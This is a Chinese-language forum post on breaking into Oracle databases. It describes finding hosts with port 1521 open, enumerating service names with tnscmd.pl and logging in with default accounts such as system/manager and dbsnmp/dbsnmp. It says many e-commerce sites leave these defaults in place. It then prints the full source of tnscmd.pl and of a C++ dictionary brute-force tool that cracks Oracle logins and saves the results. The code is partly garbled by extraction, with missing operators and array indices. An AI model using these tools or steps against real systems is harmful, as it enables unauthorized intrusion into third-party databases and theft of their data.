黑客入侵oracle数据库的一些心得
一、先看下面的一个贴子:Oracle数据库是现在很流行的数据库系统,很多大型网站都采用Oracle,它之所以倍受用户喜爱是因为它有以下突出的特点:
1、支持大数据库、多用户的高性能的事务处理。Oracle支持最大数据库,其大小可到几百千兆,可充分利用硬件设备。支持大量用户同时在同一数据上执行各种数据应用,并使数据争用最小,保证数据一致性。系统维护具有高的性能,Oracle每天可连续24小时工作,正常的系统操作(后备或个别计算机系统故障)不会中断数据库的使用。可控制数据库数据的可用性,可在数据库级或在子数据库级上控制。
2、Oracle遵守数据存取语言、操作系统、用户接口和网络通信协议的工业标准。所以它是一个开放系统,保护了用户的投资。美国标准化和技术研究所(NIST)对Oracle7 SERVER进行检验,100%地与ANSI/ISO SQL89标准的二级相兼容。
3、实施安全性控制和完整性控制。Oracle为限制各监控数据存取提供系统可靠的安全性。Oracle实施数据完整性,为可接受的数据指定标准。
4、支持分布式数据库和分布处理。Oracle为了充分利用计算机系统和网络,允许将处理分为数据库服务器和客户应用程序,所有共享的数据管理由数据库管理系统的计算机处理,而运行数据库应用的工作站集中于解释和显示数据。通过网络连接的计算机环境,Oracle将存放在多台计算机上的数据组合成一个逻辑数据库,可被全部网络用户存取。分布式系统像集中式数据库一样具有透明性和数据一致性。
具有可移植性、可兼容性和可连接性。由于Oracle软件可在许多不同的操作系统上运行,以致Oracle上所开发的应用可移植到任何操作系统,只需很少修改或不需修改。Oracle软件同工业标准相兼容,包括很多工业标准的操作系统,所开发应用系统可在任何操作系统上运行。可连接性是指ORALCE允许不同类型的计算机和操作系统通过网络可共享信息。
虽然Oracle数据库具有很高的安全性,但是如果我们在配置的时候不注意安全意识,那么也是很危险的。也就是说,安全最主要的还是要靠人自己,而不能过分依赖软件来实现。
我们知道,在mssql中,安装完成后默认有个sa的登陆密码为空,如果不更改就会产生安全漏洞。那么oracle呢?也有的。为了安装和调试的方便,Oracle数据库中的两个具有DBA权限的用户Sys和System的缺省密码是manager。笔者发现很多国内网站的Oracle数据库没有更改这两个用户的密码,其中也包括很多大型的电子商务网站, 我们就可以利用这个缺省密码去找我们感兴趣的东西。如何实现,看下面的文章吧。
进行测试前我们先来了解一些相关的知识,我们连接一个Oracle数据库的时候,需要知道它的service_name或者是Sid值,就象mssql一样,需要知道数据库名。那如何去知道呢,猜?呵呵,显然是不行的。这里我们先讲讲oracle的TNS listener,它位于数据库Client和数据库Server之间,默认监听1521端口,这个监听端口是可以更改的。但是如果你用一个tcp的session去连接1521端口的话,oracle将不会返回它的banner,如果你输入一些东西的话,它甚至有可能把你踢出去。这里我们就需要用tnscmd.pl这个perl程序了,它可以查询远程oracle数据库是否开启(也就是ping了),查询版本,以及查询它的服务名,服务状态和数据库服务名,而且正确率很高。
理论方面的讲完了,如果还有什么不懂的可以去查找相关资料。现在开始测试吧,需要的工具有:ActivePerl,Oracle客户端,Superscan或者是其它扫描端口的软件, Tnscmd.pl。
我们先用Superscan扫描开放了端口1521的主机,假设其IP是xx.xx.110.110,这样目标已经有了。然后我们要做的就是用Tnscmd.pl来查询远程数据库的服务名了,Tnscmd.pl的用法如下:
C:perlbin>perl tnscmd.pl
usage: tnscmd.pl -h hostname
where 'command' is something like ping, version, status, etc.
(default is ping)
[-p port] - alternate TCP port to use (default is 1521)
[--logfile logfile] - write raw packets to specified logfile
[--indent] - indent & outdent on parens
[--rawcmd command] - build your own CONNECT_DATA string
[--cmdsize bytes] - fake TNS command size (reveals packet leakage)
<br />
我们下面用的只有简单的几个命令,其他的命令也很好用,一起去发掘吧。
然后我们就这样来:
C:perlbin>perl tnscmd.pl services -h xx.xx.110.110 -p 1521 –indent
sending (CONNECT_DATA=(COMMAND=services)) to xx.xx.110.110:1521
writing 91 bytes
reading
._.......6.........?. ..........
DESCRIPTION=
TMP=
VSNNUM=135286784
ERR=0
SERVICES_EXIST=1
.Q........
SERVICE=
SERVICE_NAME=ORCL
INSTANCE=
INSTANCE_NAME=ORCL
NUM=1
INSTANCE_CLASS=ORACLE
HANDLER=
HANDLER_DISPLAY=DEDICATED SERVER
STA=ready
HANDLER_INFO=LOCAL SERVER
HANDLER_MAXLOAD=0
HANDLER_LOAD=0
ESTABLISHED=447278
REFUSED=0
HANDLER_ID=8CA61D1BBDA6-3F5C-E030-813DF5430227
HANDLER_NAME=DEDICATED
ADDRESS=
PROTOCOL=beq
PROGRAM=/home/oracle/bin/oracle
ENVS='ORACLE_HOME=/home/oracle,ORACLE_SID=ORCL'
ARGV0=oracleORCL
ARGS='
LOCAL=NO
'
.........@
<br />
从上面得到的信息我们可以看出数据库的服务名为ORCL,然后我们就可以通过sqlplus工具来远程连上它了,用户名和密码我们用默认的system/manager或者是sys/manager,其他的如mdsys/mdsys,ctxsys/ctxsys等,这个默认用户和密码是随版本的不同而改变的。如下:
C:oracleora90BIN>sqlplus /nolog
SQL*Plus: Release 9.0.1.0.1 - Production on Thu May 23 11:36:59 2002
(c) Copyright 2001 Oracle Corporation. All rights reserved.
SQL>connect system/manager@
(description=(address_list=(address=(protocol=tcp)
(host=xx.xx.110.110)(port=1521)))
(connect_data=(SERVICE_NAME=ORCL)));
如果密码正确,那么就会提示connected,如果不行,再换别的默认用户名和密码。经过笔者的尝试一般用dbsnmp/dbsnmp都能进去。当然如果对方已经把默认密码改了,那我们只能换别的目标了。但是我发现很多都是不改的,这个就是安全意识的问题了。
<br />
二、上面提到的两个小软件:<br />
tnscmd.pl
Copy code<br />
#!/usr/bin/perl<br />
#<br />
# tnscmd - a lame tool to prod the oracle tnslsnr process (1521/tcp)<br />
# tested under Linux x86 & OpenBSD Sparc perl5<br />
#<br />
# Initial cruft: jwa@jammed.com5 Oct 2000<br />
#<br />
# $Id: tnscmd,v 1.3 2001/04/26 06:45:48 jwa Exp $<br />
#<br />
# see als <br />
# http://www.jammed.com/~jwa/hacks/security/tnscmd/tnscmd-doc.html<br />
# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0818 <br />
# http://otn.oracle.com/deploy/security/alerts.htm<br />
# http://xforce.iss.net/alerts/advise66.php <br />
#<br />
# GPL'd, of course.http://www.gnu.org/copyleft/gpl.html<br />
#<br />
# $Log: tnscmd,v $<br />
# Revision 1.32001/04/26 06:45:48jwa<br />
# typo in url.whoops.<br />
#<br />
# Revision 1.22001/04/26 06:42:17jwa<br />
# complete rewrite<br />
#- use I:Socket instead of tcp_open<br />
#- got rid of pdump()<br />
#- put packet into @list and build it with pack()<br />
#- added --indent option<br />
#<br />
#
use I:Socket;<br />
use strict; # a grumpy perl interpreter is your friend
select(STDOUT);$|=1;
#<br />
# process arguments<br />
#
my ($cmd) = $ARGV if ($ARGV !~ /^-/);<br />
my ($arg);
while ($arg = shift @ARGV) {<br />
$main::hostname = shift @ARGV if ($arg eq "-h");<br />
$main::port = shift @ARGV if ($arg eq "-p");<br />
$main::logfile = shift @ARGV if ($arg eq "--logfile");<br />
$main::fakepacketsize = shift @ARGV if ($arg eq "--packetsize");<br />
$main::fakecmdsize = shift @ARGV if ($arg eq "--cmdsize");<br />
$main::indent = 1 if ($arg eq "--indent");<br />
$main::rawcmd = shift @ARGV if ($arg eq "--rawcmd");<br />
$main::rawout = shift @ARGV if ($arg eq "--rawout");<br />
}
if ($main::hostname eq "") {<br />
print <<_EOF_;<br />
usage: $0 -h hostname<br />
where 'command' is something like ping, version, status, etc.<br />
(default is ping)<br />
[-p port] - alternate TCP port to use (default is 1521)<br />
[--logfile logfile] - write raw packets to specified logfile<br />
[--indent] - indent & outdent on parens<br />
[--rawcmd command] - build your own CONNECT_DATA string<br />
[--cmdsize bytes] - fake TNS command size (reveals packet leakage)<br />
_EOF_<br />
exit(0);<br />
}
# with no commands, default to pinging port 1521
$cmd = "ping" if ($cmd eq "");<br />
$main::port = 1521 if ($main::port eq ""); # 1541, 1521.. DBAs are so whimsical
<br />
#<br />
# main<br />
#
my ($command);
if (defined($main::rawcmd))<br />
{<br />
$command = $main::rawcmd;<br />
}<br />
else<br />
{ <br />
$command = "(CONNECT_DATA=(COMMAND=$cmd))"; <br />
}
<br />
my $response = tnscmd($command);<br />
viewtns($response);<br />
exit(0);
<br />
#<br />
# build the packet, open the socket, send the packet, return the response<br />
#
sub tnscmd<br />
{<br />
my ($command) = shift @_;<br />
my ($packetlen, $cmdlen);<br />
my ($clenH, $clenL, $plenH, $plenL);<br />
my ($i);
print "sending $command to $main::hostname:$main::port\n";
if ($main::fakecmdsize ne "") <br />
{<br />
$cmdlen = $main::fakecmdsize;<br />
print "Faking command length to $cmdlen bytes\n";<br />
} <br />
else <br />
{ <br />
$cmdlen = length ($command);<br />
}
$clenH = $cmdlen >> 8;<br />
$clenL = $cmdlen & 0xff;
# calculate packet length
if (defined($main::fakepacketsize)) <br />
{<br />
print "Faking packet length to $main::fakepacketsize bytes\n";<br />
$packetlen = $main::fakepacketsize;<br />
} <br />
else <br />
{ <br />
$packetlen = length($command) 58; # "preamble" is 58 bytes<br />
}
$plenH = $packetlen >> 8;<br />
$plenL = $packetlen & 0xff;
$packetlen = length($command) 58 if (defined($main::fakepacketsize));
# decimal offset<br />
# 0:packetlen_high packetlen_low <br />
# 26:cmdlen_high cmdlen_low<br />
# 58:command
# the packet.
my (@packet) = (<br />
$plenH, $plenL, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, <br />
0x01, 0x36, 0x01, 0x2c, 0x00, 0x00, 0x08, 0x00,<br />
0x7f, 0xff, 0x7f, 0x08, 0x00, 0x00, 0x00, 0x01,<br />
$clenH, $clenL, 0x00, 0x3a, 0x00, 0x00, 0x00, 0x00,<br />
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,<br />
0x00, 0x00, 0x00, 0x00, 0x34, 0xe6, 0x00, 0x00,<br />
0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,<br />
0x00, 0x00<br />
);
<br />
for ($i=0;$i<length($command);$i) <br />
{<br />
push(@packet, ord(substr($command, $i, 1)));<br />
}
my ($sendbuf) = pack("C*", @packet);
print "connect ";<br />
my ($tns_sock) = I:Socket::INET->new( <br />
PeerAddr => $main::hostname, <br />
PeerPort => $main::port, <br />
Proto => 'tcp', <br />
Type => SOCK_STREAM, <br />
Timeout => 30) || die "connect to $main::hostname failure: $!";<br />
$tns_sock->autoflush(1);
print "\rwriting " . length($sendbuf) . " bytes\n";
if (defined($main::logfile)) <br />
{<br />
open(SEND, ">$main::logfile.send") || die "can't write $main::logfile.send: $!";<br />
print SEND $sendbuf || die "write to logfile failed: $!";<br />
close(SEND);<br />
}
my ($count) = syswrite($tns_sock, $sendbuf, length($sendbuf));
if ($count != length($sendbuf))<br />
{<br />
print "only wrote $count bytes?!";<br />
exit 1;<br />
}
print "reading\n";
# get fun data<br />
# 1st 12 bytes have some meaning which so far eludes me
if (defined($main::logfile)) <br />
{<br />
open(REC, ">$main::logfile.rec") || die "can't write $main::logfile.rec: $!";<br />
}
my ($buf, $recvbuf);
# read until socket EOF<br />
while (sysread($tns_sock, $buf, 128))<br />
{<br />
print REC $buf if (defined($main::logfile));<br />
$recvbuf .= $buf;<br />
}<br />
close (REC) if (defined($main::logfile));<br />
close ($tns_sock);<br />
return $recvbuf;<br />
}
<br />
sub viewtns<br />
{<br />
my ($response) = shift @_;
# should have a hexdump option . . .
if ($main::raw)<br />
{<br />
print $response;<br />
} <br />
else<br />
{<br />
$response =~ tr/\200-\377/\000-\177/; # strip high bits<br />
$response =~ tr/\000-\027/\./;<br />
$response =~ tr/\177/\./;
if ($main::indent)<br />
{<br />
parenify($response);<br />
} <br />
else<br />
{<br />
print $response;<br />
}<br />
print "\n";<br />
} <br />
}
<br />
sub parenify<br />
{<br />
my ($buf) = shift @_;<br />
my ($i, $c);<br />
my ($indent, $o_indent);
for ($i=0;$i<length($buf);$i) <br />
{<br />
$c = substr($buf, $i, 1);<br />
$indent if ($c eq "(");<br />
$indent-- if ($c eq ")");<br />
if ($indent != $o_indent)<br />
{<br />
print "\n" unless(substr($buf, $i 1, 1) eq "(");<br />
print "" x $indent;<br />
$o_indent = $indent;<br />
undef $c;<br />
} <br />
print $c;<br />
}<br />
}
<br />
Copy code<br />
/*用链表实现的oracle密码暴破程序,需要在本地安装oralce*/<br />
#define WIN32_LEAN_AND_MEAN<br />
#if defined(_WIN32) || defined(_WIN64)<br />
#include <windows.h><br />
#include <Tchar.h><br />
#endif<br />
#include <winsock2.h> <br />
#include <stdio.h><br />
#include <stdlib.h><br />
#include <lmcons.h><br />
#include <winnetwk.h><br />
#include <time.h><br />
#include <stdlib.h><br />
#include <stdlib.h><br />
#include <iostream> <br />
#include <occi.h>
<br />
#pragma comment(lib, "oraocci9.lib") //链接到oraocci9.lib库<br />
//#pragma comment(lib, "msvcrt.lib")<br />
#pragma comment(lib, "msvcprt.lib")<br />
//链接到WS2_32.LIB库:<br />
#pragma comment(lib, "Ws2_32.lib")<br />
//#pragma comment(lib, "liboracle.lib")
char target= {0};//目标服务器<br />
char port={0};//SQL端口号<br />
char db={0};//数据库名
//定义链表:<br />
typedef struct PassNode{<br />
TCHAR password;<br />
struct PassNode * Next;<br />
} PassInfo;
typedef struct NameNode{<br />
TCHAR Name;<br />
struct NameNode * Next;<br />
}NameInfo; //定义NameInfo来表示NameNode结构
//<br />
//函数SQLCheck<br />
//功能:尝试用不同密码连接SQL Server,探测出正确的密码<br />
//<br />
DWORD WINAPI SQLCheck(PVOID pPwd,PVOID uUserName)<br />
{<br />
//定义局部变量<br />
char szBuffer= {0};<br />
char *pwd=NULL,*UserName=NULL;<br />
char DataBase={0};<br />
//char *user=NULL;<br />
//取得传递过来准备探测的密码<br />
pwd=(char *)pPwd;<br />
UserName=(char *)uUserName;<br />
//DataBase=(char *)db;<br />
sprintf(DataBase,"(description=(address_list=(address=(protocol=tcp)(host=%s)(port=%s)))(connect_data=(SERVICE_NAME=%s)))",target,port,db);<br />
//printf("DataBase=%s\n",DataBase);<br />
using namespace std; <br />
using namespace oracle::occi;
Environment * env=Environment::createEnvironment(Environment::DEFAULT);
try{ <br />
Connection *conn=env->createConnection(UserName,pwd,(char *)DataBase); <br />
if (conn) <br />
{ printf("\n");<br />
cout << "SUCCESS - createConnection" << endl;<br />
<br />
//连接远程oracle Server数据库成功<br />
return 1;<br />
}<br />
else <br />
cout << "FAILURE - createConnection" << endl; <br />
return 0;
/*Statement*stmt=conn->createStatement("select * from emp"); <br />
ResultSet * rset=stmt->executeQuery(); <br />
while (rset->next()) { <br />
cout<<"the empno is:"<<rset->getInt(1)<<endl; <br />
cout<<"the ename is:"<<rset->getString(2)<<endl;
} */<br />
//stmt->closeResultSet (rset); <br />
// conn->terminateStatement (stmt); <br />
env->terminateConnection (conn);
}catch(SQLException ex)
{ <br />
//printf("\n");<br />
cout<<ex.getMessage(); <br />
return 0;
} <br />
Environment::terminateEnvironment(env);<br />
return 0;<br />
}
<br />
void usage(){
printf("name:oracle password crack v 1.0\n");<br />
printf("author:pt007@vip.sina.com\n\n");<br />
fprintf(stdout,"usage : oracle_pwd_crack \n");<br />
printf("options:\n"<br />
"\t-x port specify the port of oracle\n"<br />
"\t-u usernamespecify the username of oracle\n"<br />
// "\t-p passwordspecify the password of oracle\n"<br />
"\t-d dict specify the dictionary\n"<br />
"\t-i databasespecify the database's name\n"<br />
//"\t-a automodeautomatic crack the oracle password \n"<br />
//"\tNote: when u use the -a option, named the username dict user.dic\n"<br />
// "\tpassword dict pass.dic\n"<br />
);<br />
printf("\nexample: oracle_pwd_crack 127.0.0.1 -x 1521 -u sql_user.dic -d pass.dic -i PLSExtProc\n");<br />
<br />
exit(1);
}
//创建密码链表:<br />
PassInfo * Create_Pass_link(int NodeNum, FILE * DictFile){
/* read data from password dictionary, init the link */<br />
TCHAR * szTempPass = NULL;<br />
PassInfo *h, *p, *s; /* *h point to head node, *p point to the pre node,<br />
*s point to the current node*/<br />
int i; /* counter*/
//分配内存空间在内存的动态存储区中分配一块长度为"sizeof(PassInfo)"字节的连续区域,函数的返回值为该区域的首地址:<br />
if ( (h = (PassInfo *) malloc(sizeof(PassInfo))) == NULL ) <br />
{<br />
fprintf(stderr, "malloc failed %d", GetLastError());<br />
exit(0);<br />
} /* create the head node */
/* init the head node*/<br />
h->Next = NULL;<br />
p = h;
for ( i=0; i < NodeNum; i ) //下面是建立链表,每个密码对应一个结点:<br />
{//按sizeof(TCHAR)的长度分配100块连续的区域,并把指向TCHAR类型指针的首地址赋予指针变量szTempPass<br />
szTempPass = (TCHAR *)calloc(100, sizeof(TCHAR));<br />
ZeroMemory(szTempPass, 100);
if ( (s = (PassInfo *)malloc(sizeof(PassInfo))) == NULL)<br />
{<br />
fprintf(stderr, "malloc failed %d", GetLastError());<br />
exit(0);<br />
}<br />
<br />
memset(s->password, '\0', 100);<br />
fgets(szTempPass, 100, DictFile);<br />
strncpy(s->password, szTempPass, strlen(szTempPass)-1);<br />
s->Next =NULL; //删除一个结点<br />
p->Next = s;//链表指针指向下一个结构地址<br />
p = s;//下一个结构的数据域赋值
free(szTempPass);//释放内存空间
}<br />
<br />
return h;//返回链表的头结点,它存放有第一个结点的首地址,没有数据
}
<br />
//创建用户名链表:<br />
NameInfo * Create_Name_link(int NodeNum, FILE * DictFile){
/* read data from password dictionary, init the link */<br />
TCHAR * szTempName = NULL;<br />
NameInfo *h, *p, *s; /* *h point to head node, *p point to the pre node,<br />
*s point to the current node*/<br />
int i; /* counter*/
//分配内存空间在内存的动态存储区中分配一块长度为"sizeof(NameInfo)"字节的连续区域,函数的返回值为该区域(此处为NameInfo结构的首地址)的首地址: :<br />
if ( (h = (NameInfo *) malloc(sizeof(NameInfo))) == NULL )<br />
{<br />
fprintf(stdout, "malloc failed %d", GetLastError());<br />
exit(0);<br />
} /* create the head node */
/* init the head node*/<br />
h->Next = NULL; //删除下一个结点<br />
p = h; //p里面目前指向头结点
for ( i=0; i < NodeNum; i )<br />
{//按sizeof(TCHAR)的长度分配100块连续的区域,并把指向TCHAR类型指针的首地址赋予指针变量szTempPass:<br />
szTempName = (TCHAR *)calloc(100, sizeof(TCHAR));<br />
ZeroMemory(szTempName, 100);//字符串类型变量清0
if ( (s = (NameInfo *)malloc(sizeof(NameInfo))) == NULL)<br />
{<br />
fprintf(stdout, "malloc failed %d", GetLastError());<br />
exit(0);<br />
}<br />
<br />
memset(s->Name, '\0', 100);<br />
fgets(szTempName, 100, DictFile);<br />
strncpy(s->Name, szTempName, strlen(szTempName)-1);<br />
s->Next =NULL;<br />
p->Next = s;//p指向下一个结点的地址<br />
p = s;//下一个结构的数据域赋值
free(szTempName);
}<br />
<br />
return h;
}
<br />
int LineCount(FILE * fd) //返回字典中的密码数量<br />
{<br />
int countline = 0;<br />
char data = {0};//字符数组清0
while (fgets(data, 100, fd))//从指定的文件中读一个字符串到字符数组中<br />
countline;
rewind(fd);//指针返回到文件起始处
return countline;<br />
<br />
}
BOOL IsPortOpen(char * address, int port)<br />
{<br />
int recv = 1;<br />
WSADATA wsadata;<br />
int fd;<br />
struct sockaddr_in clientaddress;<br />
struct hostent * host1;<br />
BOOL Result = FALSE;<br />
struct timeval timer4;<br />
fd_set writefd; //检查数据是否可写<br />
ULONG value = 1;<br />
//初使化winsock版本1.1:<br />
recv = WSAStartup(MAKEWORD(1,1), &wsadata);
if(recv != 0) <br />
{<br />
printf("init failed %d.\n",WSAGetLastError());<br />
return(0);<br />
}
if ( LOBYTE( wsadata.wVersion ) != 1 || <br />
HIBYTE( wsadata.wVersion ) != 1 ) { <br />
/* Tell the user that we couldn't find a useable */ <br />
/* winsock.dll. */ <br />
WSACleanup(); <br />
return(0); <br />
}<br />
//创建socket套接字连接:<br />
fd = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);<br />
if(fd < 0)<br />
{<br />
<br />
printf("[-] Create socket error %d. \n",WSAGetLastError());<br />
return(0);<br />
}<br />
//将套接字fd设为非阻塞模式的方法:<br />
ioctlsocket(fd,FIONBIO,&value);
if (!(host1 = gethostbyname(address))){<br />
printf("[-] Gethostbyname(%s) error %d.\n",address,WSAGetLastError());<br />
return(0);<br />
}
memset(&clientaddress, 0, sizeof(struct sockaddr));<br />
clientaddress.sin_family =AF_INET;//Ipv4地址族<br />
clientaddress.sin_port = htons((unsigned short)port);<br />
clientaddress.sin_addr = *((struct in_addr *)host1->h_addr);
timer4.tv_sec = 5;//以秒为单位指定等待时间<br />
timer4.tv_usec = 0;
FD_ZERO(&writefd);<br />
FD_SET(fd,&writefd); //将套接字fd增添到writefd写集合中进行测试
recv = connect(fd, (struct sockaddr *)&clientaddress, sizeof(struct sockaddr));
if( FD_ISSET(fd, &writefd))<br />
{<br />
recv = select(fd 1, NULL, &writefd, NULL, &timer4);//测试5秒钟内是否有数据写入
if( recv > 0 ) <br />
Result = TRUE;<br />
}
closesocket(fd);<br />
WSACleanup();
return Result;
}
<br />
int main(int argc, char **argv)<br />
{
PassInfo * head, * curr = NULL;<br />
NameInfo * headnode, * currnode = NULL;<br />
int namecount = 0, passcount = 0;
/////////////////////////////////////////////////////////////////////////////////////////////<br />
// deal with the command line<br />
//<br />
/////////////////////////////////////////////////////////////////////////////////////////////<br />
//参数不为8个的时候打印帮助<br />
if(argc != 10)<br />
usage();
if (argc == 10)<br />
{<br />
if ( strcmpi(argv, "-x") )<br />
usage();
if ( strcmpi(argv, "-u") )<br />
usage();
if ( strcmpi(argv, "-d") )<br />
usage();<br />
if ( strcmpi(argv, "-i") )<br />
usage();<br />
<br />
}
/* determinate whether the oracle port is open */<br />
if( !IsPortOpen(argv, atoi(argv) ) )<br />
{<br />
printf("error:Can't connect to %s:%d\n", argv, atoi(argv));<br />
exit(0);<br />
}<br />
////////////////////////////////////////////////////////////////////////////////////////////<br />
// specifiy the username<br />
//////////////////////////////////////////////////////////////////////////////////////////////
//取得目标地址和端口号:<br />
strcpy(target,argv);<br />
strcpy(port,argv);<br />
strcpy(db,argv);
if ( !strcmpi(argv, "-u"))<br />
{<br />
/* open the password dictionary */
FILE * passdic = NULL;<br />
if ( (passdic = fopen(argv, "r")) ==NULL){<br />
fprintf(stdout, "Can't open the password dictionary\n");<br />
exit(0);<br />
}<br />
<br />
<br />
<br />
/* count line of name dictionary */
passcount = LineCount(passdic); //计算密码的数量<br />
head = Create_Pass_link(passcount, passdic);/* create the password link */<br />
curr = head ->Next; //指向第一个结点
/* open the password dictionary */
FILE * Namedict = NULL;<br />
if ( (Namedict = fopen(argv, "r")) ==NULL){<br />
fprintf(stderr, "Can't open the name dictionary\n");<br />
exit(0);<br />
}
/*密码最终保存文件*/<br />
FILE *passtxt=NULL;<br />
if ( (passtxt = fopen("pass.txt", "at ")) ==NULL){<br />
fprintf(stdout, "Can't write pass.txt file!\n");<br />
exit(0);<br />
}
/* count line of name dictionary */
namecount = LineCount(Namedict);//计算用户名数量<br />
headnode = Create_Name_link(namecount, Namedict);/* create user link */<br />
currnode = headnode->Next;
int j=0,i=1;<br />
while(currnode!=NULL) //为NULL表示姓名链表结束<br />
{<br />
printf("\n开始第%d位用户%s测试:\n",j,currnode->Name);<br />
while(curr != NULL) //为NULL表示密码链表结束<br />
{<br />
printf("Now cracking %s->%s \n", currnode->Name, curr->password);<br />
fflush(NULL);<br />
int Cracked=0;<br />
Cracked=SQLCheck(curr->password,currnode->Name);<br />
if ( Cracked==1 )<br />
{<br />
printf("%d.Successfully:oracle server %s's username [%s] password [%s]\n",j,target,currnode->Name, curr->password);<br />
fseek(passtxt, 0L, SEEK_END);//移动到文件尾部<br />
fprintf(passtxt,"%d.Successfully:oracle server %s's username [%s] password [%s]\r\n",i,target,currnode->Name, curr->password);<br />
//exit(0);发现一个密码就退出<br />
break;<br />
}<br />
curr = curr->Next;//移动到下一个结点<br />
Sleep(100);//暂停100ms,即0.1s
} /* starting crack the oracle password*/<br />
currnode = currnode->Next;<br />
curr = head ->Next; //移到密码链表的第一个结点<br />
}<br />
printf("\n\n密码猜解结束:\n本次共猜解了%d位用户,%d个密码!\n",namecount,passcount);<br />
printf("请使用\"type pass.txt\"来查看当前目录下的pass.txt文件!\n");<br />
fprintf(passtxt,"\r\n\r\n");<br />
fclose(passdic);<br />
fclose(Namedict);<br />
fclose(passtxt);<br />
free(head);
<br />
}
return 0;
}<br />
<br />
頁:
[1]